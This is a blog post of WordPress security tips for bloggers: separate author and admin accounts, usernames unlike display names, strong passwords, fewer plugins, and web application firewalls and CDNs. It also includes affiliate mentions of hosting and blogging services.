It’s one of those things none of us want to have to go through with our blog, yet lately, it seems that I hear it’s happened to someone almost daily. A site gets compromised, viruses get planted, and users get infected. Some of us are able to resolve the issue, pick up the pieces, and move on. But for others it’s not so easy and, the potential to lose everything is always there lingering. Today, I want to talk about how to secure your blog through a few easy steps.
Hide Your Login Page?
A lot of individuals get hung up on hiding the login page. It’s pretty much the understanding that if you are running a WordPress Content Management System (CMS) you login at /wp-admin/(wp-login.php). We feel that if we hide the login page, it’ll make it that much harder for someone trying to gain access to the site. There is even arguments that it will help in hiding the fact that you are using WordPress, your content, CSS, Plugins, versions, etc. Let me stop you right there and tell you, don’t waste your time. Its’ a false sense of security and doesn’t really do much for you. Don’t believe me? Keep reading! Instead, invest in a few of the below methods.
Simple and free debugging tools like Fiddler Web Debugger can give us a wealth of information on a website with just typing in the URL and hitting GO. This isn’t a malicious website scanning tool, and all of this information collected from Fidder is also free flowing to any web browser when accessing a website. The above image shows that this site is using CloudFlare CDN most likely on a bluehost NGinx server, and is running the CloudFlare WP Plugin (version 1.3.16 to be exact). The below image shows a site using the Foodie theme, it’s CSS version of 1.0.9 (it even provided me the entire CSS file), as well as other potential plugin information. I could then easily start doing research on how to exploit those plugins, the theme, or WordPress itself.
So how do we secure our site if it’s this easy to sniff this information? This is all common data and there are ways to secure yourself. Lets look at some basics.
Administrators vs Authors
Most of us start our site with one login, the administrator account. We go to work posting and developing content never thinking twice about making any other logins. Why would you, since you’re the only one posting and accessing the site anyway?
First, if you’re using the default admin login to WP you need to change it to something off the wall. Second, never post anything with your administrator account, keep that account for only back end operations like updating your site, making major site changes, and updating plugins. Instead, create yourself an author account for posting. This way, when you start posting content your administrator account isn’t shown to the world in the “Post By” section. It may take a few extra steps when you want to administer the site vs post content but it has the potential to save you a headache down the road.
Simply login to your WordPress site as your administrator, click Users, then click Add New. Once the user is created, simply edit the user and choose Author for the role (see images below).
Display Name vs Username
Which brings me to usernames and display names. When creating a user make sure the username is something different than the posting name (this goes for good old ‘admin’ as well). If I create myself an author with the name Dave and make the username Dave as well, that takes a lot of complexity out of having to guess the login name, half the battle is done by a hacker – now I just need to guess your password which probably has something to do with your pet, your significant other,… or your children – things you most likely post about on a weekly bases! So do yourself a favor and create a username different then your display name like I have in the example below.
Once your user is created, edit the user and choose the Display Name you want. Do this for all your authors, as well as your administrator account.
If you already have usernames the same as your display name you can’t change them (grayed out), but you can create a new username and port all your old posts over to that new login.
We’ve all heard about it and hopefully by now we practice password complexity. There is a lot of controversy about what makes a secure password these days. Is it length? Is it complexity? We all have so many passwords floating around our heads it’s hard to add one more to the mix! Keep yourself secure and mix complexity with length and you’ll never lose. For Example P4nc4kew4RRi0r$rockS! mixes words, with complexity, and length. Awesome password by the way.
Limit Your Plugins
As your site and needs grow, so do your plugin requirements. Stick to legit plugins with active support. Remove any old plugins you no longer use – and always update your plugins!
Web Application Firewall (WordPress Plugin)
These day’s complex passwords and hidden usernames don’t do enough when WordPress and it’s plugins are exploited. Whether you know it or not, your site is constantly being crawled by bots, and scanned for exploits by hackers. Yup, it’s true. It’s hard to know these things are going on when you don’t have a way to see it! With that being said, you want to know who’s trying to access your site (real time), when they’re trying to access it, how many times they’ve attempted, the location they’re accessing from, if they’re scanning your site for vulnerabilities…. the list goes on. Luckily there are web application firewall (WAF) security plugins for that. They allow you to see everything I just mentioned, as well as provide reactive and proactive methods to stop these threats. Below is a list of security plugins; each come with their pros and cons, and they each have their premium paid for features. Try them on your site and see which one you like best!
Side Note: By default wordpress has custom errors for both valid and invalid user login attempts. This gives a green light to anyone trying to gain access to your site that guesses your login username. If I enter a valid login wordpress lets me know – big no no! The above programs fix this issue with options such as Wordfences’s “Don’t let WordPress reveal valid users in login errors”.
Hosted Content Delivery Network (CDN) and Web Application Firewalls (WAF)
I can’t say enough about Web Application Firewalls and Content Delivery Networks and their benefits. The downside being that they aren’t free, but nothing good ever is. Before you stop reading here, I encourage you to continue – you’ve come this far and this is where things can get really scary!
So plugin Firewalls at the WordPress level will get you some security but what about the high level attacks? Someone trying to guess your password is more of an annoyance than anything when it comes to more complex attacks like denial of service, database injection, or cross side scripting (say what!?). If I can find a vulnerability into your site and inject data into it, I can do anything, all of which can be done without needing your password! That pretty much rules out any fear of someone cracking your password in my book. That’s why a WAF and CDN are so important.
Some of the most common attacks these days is something called cross site scripting (XSS). This is where a hacker injects your vulnerable site with malicious code, most likely through a vulnerability which is usually a plugin. Then when I,the victim, visits your site, I am infected. Typically, in this scenario my computer begins to transmit my personal data to that attacker or my computer becomes part of a botnet cluster which is used for other malicious intent like sending spam emails. We don’t want to do this to our readers, do we? CDNs and WAFs play the middleman in these scenarios.
(awesome image courtesy of sitelock.com)
These services work as proxies filtering and parsing the data and traffic between the user looking at your site and the server serving up the content. They also provide external scanning, as well internal scanning making sure all your files are 100% clean and your site is free of security holes and viruses. Malicious attempts will be hitting a middle proxy server and not the actual site itself. These services usually include CDNs which provide caching to serve up your website faster. CDNs and WAFs are usually packaged with your hosting provider plans but you can purchase them separately as well. I am most familiar with BlueHost (affiliate link) and their security packages and have been very happy with them.
Please note, I have mentioned all affiliate links in this post. However, none of these companies paid me for this post, and these are all my own thoughts and opinions.
You can always find me, as well as other blogging help on FoodBloggerPro.com (affiliate link). It’s not just for food bloggers. You can also find me on LinkedIn or contact me if you’re looking for blog assistance!
What About You?
- Did this help you? Would this be something you’d like to see more of?
- Would you have rather this been a food post? lol
I also provide blogging services from new site implementations, transfers, theme tweaking and coding, small tweaks and fixes as well as help you monetize your blog the most efficient way possible. Feel free to contact me on our contact page. I don’t provide fees on our site because like bloggers, all blogs are different and therefore one price doesn’t fit all!